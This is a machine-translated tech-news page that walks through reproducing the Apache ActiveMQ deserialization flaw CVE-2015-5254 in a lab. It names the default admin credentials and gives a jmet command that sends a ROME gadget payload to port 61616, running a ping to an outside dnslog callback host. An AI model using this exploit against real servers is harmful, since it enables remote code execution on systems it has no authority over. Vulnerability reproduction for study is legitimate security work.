Add to Favorites | Login | Register
Network Security Internet Technology Development Database Servers Mobile Phone Android Software Apple Software Computer Software News IT Information

In addition to Weibo, there is also WeChat

Please pay attention

WeChat public account

Shulou

About us Contact us

What is the CVE-2015-5254 reproduction of the ActiveMQ deserialization vulnerability

2025-01-16 Update From: SLTechnology News&Howtos shulou NAV: SLTechnology News&Howtos > Network Security >

Share

Shulou(Shulou.com)05/31 Report--

This article is about the ActiveMQ deserialization loophole CVE-2015-5254 reproduction is how, the editor feels very practical, so share with you to learn, I hope you can learn something after reading this article, say no more, follow the editor to have a look.

Apache ActiveMQ is a set of open source message middleware developed by Apache Software Foundation in the United States, which supports Java message service, cluster, Spring Framework and so on. A security vulnerability exists in version 5.x of Apache ActiveMQ prior to 5.13.0, which stems from the fact that the program does not limit the classes that can be serialized in the agent. Remote attackers can exploit this vulnerability to execute arbitrary code via a specially crafted serialized Java message Service (JMS) ObjectMessage object.

The following is only the vulnerability recurrence record and implementation, and the utilization process is as follows:

I. vulnerability environment information

Target link: http://192.168.101.152:8161/

Visit activemq to check whether the deployment is successful

Http://192.168.101.152:8161/admin/ default account password (admin/admin)

Second, vulnerability exploitation

Execute a command

Java-jar jmet-0.1.0-all.jar-Q event-I ActiveMQ-s-Y "ping test.z7wb3x.dnslog.cn"-Yp ROME 192.168.101.152 61616

An event queue is added to the ActiveMQ by accessing the

Http://192.168.101.152:8161/admin/browse.jsp?JMSDestination=event

You can see this queue.

Click and execute the command

Command executed successfully

This is what the CVE-2015-5254 reproduction of ActiveMQ deserialization vulnerabilities looks like. The editor believes that there are some knowledge points that we may see or use in our daily work. I hope you can learn more from this article. For more details, please follow the industry information channel.

Welcome to subscribe "Shulou Technology Information " to get latest news, interesting things and hot topics in the IT industry, and controls the hottest and latest Internet news, technology news and IT industry trends.

Views: 0

*The comments in the above article only represent the author's personal views and do not represent the views and positions of this website. If you have more insights, please feel free to contribute and share.

Tag Search: Vulnerabilities sequences commands messages successes more knowledge articles queues services utility security middleware events codes clubs available in funds security vulnerabilities passwords vpn macOS Linux MariaDB MySQL Docker Shulou Information Shulou Technology Shulou Tech Info OPPO Reno Redmi Xiaomi NVidia Microsoft Huawei Apple Linux Apple Redmi Xiaomi Microsoft Huawei vpn OPPO Reno macOS MySQL Docker NVidia Shulou Tech Info MariaDB Shulou Technology Shulou Information Linux Apple Redmi Xiaomi Microsoft Huawei vpn OPPO Reno macOS MySQL Docker NVidia Shulou Tech Info MariaDB Shulou Technology Shulou Information

Share To

Related

Network Security

More Network Security >

Latest Network Security More Network Security >

Latest Internet Technology More Internet Technology >

Latest Development More Development >

Latest Database More Database >

Latest Servers More Servers >

Latest Mobile Phone More Mobile Phone >

Latest Android Software More Android Software >

Latest Apple Software More Apple Software >

Latest Computer Software News More Computer Software News >

Latest IT Information More IT Information >

Wechat

About us Contact us Product review car news thenatureplanet

© 2024 shulou.com SLNews company. All rights reserved.

12
Report